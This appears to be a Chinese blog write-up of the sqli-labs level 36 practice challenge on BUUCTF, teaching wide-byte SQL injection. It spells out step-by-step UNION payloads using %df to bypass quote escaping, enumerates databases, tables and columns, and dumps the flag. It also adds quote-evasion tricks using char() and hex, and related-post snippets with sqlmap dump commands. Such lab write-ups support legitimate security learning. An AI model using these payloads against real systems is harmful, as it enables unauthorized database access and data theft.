buuctf的sqli-labs靶场的36关,(宽字节注入)

最新推荐文章于 2024-03-21 09:47:50 发布
最新推荐文章于 2024-03-21 09:47:50 发布
阅读量214 收藏
点赞数
文章标签: 网络安全 系统安全 web安全 密码学 计算机网络 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44652484/article/details/133658408
版权

目录

开启buuctf靶机

开始宽字节注入

注意(1):

注意(2):

开启buuctf靶机

BUUCTF在线评测

找到第36关

开始宽字节注入

(1)确认有几个字段:?id=1 %df' order by 3%23
(2)爆库名:(ctftraining,information_schema,mysql,performance_schema,security,test)
?id=1 %df' and 1=2 union select 1,2,(select group_concat(schema_name) from information_schema.schemata) --+
(3)爆表名:flag,news,users
?id=1 %df' and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=char(99,116,102,116,114,97,105,110,105,110,103)) --+
(4)爆数据:flag
?id=1 %df' and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=0x637466747261696E696E67 and table_name=0x666C6167) --+
(5)爆flag:flag{330424d1-f551-4cc2-96ed-8e37018fe6c7}
?id=1 %df' and 1=2 union select 1,2,(select group_concat(flag) from ctftraining.flag)--+

注意(1):

爆表名的时候这里有个小坑,就是库名这里不能有单双引号,否则会被转义

注意(2):

先把刚才爆出来的库名字符转换成ASCII码,然后这里使用char()函数转换成可打印字符

还可以把库名使用hex转字符串的方法,0x637466747261696E696E67

这里有几种注入方式:char()、二进制、十六进制、传参

DMXA
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqli-labs靶场
02-12
sqli-labs靶场
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
BUUCTF/sqli-labs 1-23
最新发布
weixin_44041994的博客
03-21 795
因为#号后面都被注释了。这输入正确用户名密码后,页面显示的不再是User-Agent,而是变成了Refer,我们通过抓包更改Refer,发现和18差不多,只不过18有3个参数,而19只有两个参数。上面提示让我们使用outfile,outfile是sql的语法,可以通过into outfile命令,将查询到的结果写入目标路径,在知道目标系统的绝对路径时可以使用,如。这通过测试,发现无论sql语句正确与否,返回的信息都是一样的,这样就不符合布尔注入的前提了,布尔盲注只适用于正确与错误结果不同的情况。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
Sqli-labs靶场 Less6
orchid_sea的博客
07-12 340
判断注入类型 双引号注入判断字段数 字段数为3判断数据库版本 版本MYSQL>5 4. 判断数据库的名字 爆破出数据库的名字为 security 5. 判断库中每个表名的长度 第一个表名长度为6 第二个表名长度为8 第三个表名长度为7 第四个表名长度为5 没有第五个表 查询ASCII码对照表,101对应小写的e,即第一个表的第一个字符为 e第一个表的第二个字符为 m 第一个表的第三个字符为 a 。。。 上帝视角,我们直接测试第四个表 第四个表的第一个字符为u 第四个表的第二个字符为s 第四个表的第三个字符
Sqli-Labs(1-10)通笔记
weixin_54894046的博客
04-02 4420
靶场环境 buuctf靶场 来到第一 根据提示:提交方式GET 有报错提示 闭合方式为单引号 源码的sql语句为 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 使用?id=1传参 不要问我为啥这样写 我也不知道 依次使用?id=2,3,4,5,6.....不知道这要干嘛QAQ 目标:得到数据库名字 表名 字段名 数据 输入?id=1'%23 原理用自己添加的单引号闭合 然后用#注释掉后面的单引号 不过#要用url编码成%
注入攻击(一)--------SQL注入(结合BUUCTF sqli-labs)
Young12138的博客
05-10 1766
为了准备信息安全技术课程汇报做的笔记,想着做了也是做了,不如分享出来给想我一样的初学者学习。本人之前没有做过CTF,也没有学过SQL注入,零基础,所以大佬可以先行离开。内容是SQL注入XPath注入HTML注入
BUUCTF basic BUU CODE REVIEW 1&sqli-labs &BUU UPLOAD COURSE 1
网安小趴菜
08-26 983
BUUCTF basic BUU CODE REVIEW 1&sqli-labs&BUU UPLOAD COURSE 1 wp
【SQL注入漏洞-09】字节注入靶场实战
cc
02-07 5625
如果数据库使用的是DBK编码,而PHP使用的是UTF-8编码 ,那这样就可能出现注入问题。原因是程序员为了防止SQL注入,就会调用addslashes转移函数,将单引号或双引号进行转义操作,转义无非便是在单或双引号前加上转义字符(\)进行转义 ,但这样并非安全,因为数据库使用的是字节编码,两个连在一起的字符会被当做是一个汉字,而在PHP使用的UTF-8编码则认为是两个独立的字符,如果我们在单或双引号前添加一个字符,使其和转义字符(\)组合被当作一个汉字,从而保留单或双引号,成功进行字节注入
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
buu sqli-labs 【basic】
weixin_52942048的博客
10-07 78
打开链接,需要跳2次才到这个题目页面!!!
SQL——labs第5、6(报错注入)
m0_72471814的博客
07-27 134
第二步:正确之后页面只有一个you are in。第六步:爆破账号密码。
Sqli-Labs~1 详解
Cy610610的博客
12-04 1163
sqli-labs第一,手把手教学,包学包会!内含informations_schema数据库解释说明等相内容
【sql常见注入方法3种】--靶场lovesql
m0_63241485的博客
09-02 1504
sqlmap使用,手动sql注入,其他sql注入工具使用
BUUCTF-sqli-labs1
Nothing-one的博客
07-16 1531
根据题目内容他让我们(请输入id作为带数值的参数 )这个为数字型注入。 这里面我用了sqlmap工具来进行解题。 在里面输入 python sqlmap.py -u +(网站名)(记住在网站名后面要加入?id=1) --dbs #获取数据库 这样我们就可以获得数据库中的名称了。 下面我们就要看数据库中的表明了。 python sqlmap.py -u +(网站名) -D 数据库名 --tables #列出表名 我们知道了表名,下面我们就要爆出字段名。 python sqlmap.py -u +(网站名)
buuctf---sqli-labs靶场,两种报错注入的方式(XPATH型和主键重复型)
DMXA的博客
10-07 219
【代码】buuctf---sqli-labs靶场,两种报错注入的方式(XPATH型和主键重复型)
sqli-labs buuctf平台+本地环境 全全解 不是很详解(<_<)
weixin_48083470的博客
07-12 1843
sqli-labsbuuctf平台 搜索sqli-labs 可以更加模拟线上赛的环境 less-1 less-5 ?id=0' and(select extractvalue(1,concat('~',(select database())))) %23 报错注入详细讲解:https://blog.csdn.net/silence1_/article/details/90812612 less-6 发现不报错了,用布尔盲注 写python代码来跑出内容 import requests url
sqli-labs靶场15
07-28
SQLMap是一个开源的SQL注入自动化工具,可以帮助你通过SQLi-Labs靶场。使用SQLMap,你需要熟悉基本的命令行语法,并了解SQL注入的基本原理。为了使用SQLMap通过SQLi-Labs靶场,你可以尝试使用以下命令: ``` sqlmap -u <target URL> --dbs ``` 这将列出数据库列表。接下来,你可以使用以下命令枚举数据表: ``` sqlmap -u <target URL> -D <database name> --tables ``` 最后,你可以使用以下命令读取数据表中的数据: ``` sqlmap -u <target URL> -D <database name> -T <table name> --dump ``` 请注意,在实际渗透测试中,使用SQLMap和其他工具需要遵循道德准则和法律规定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值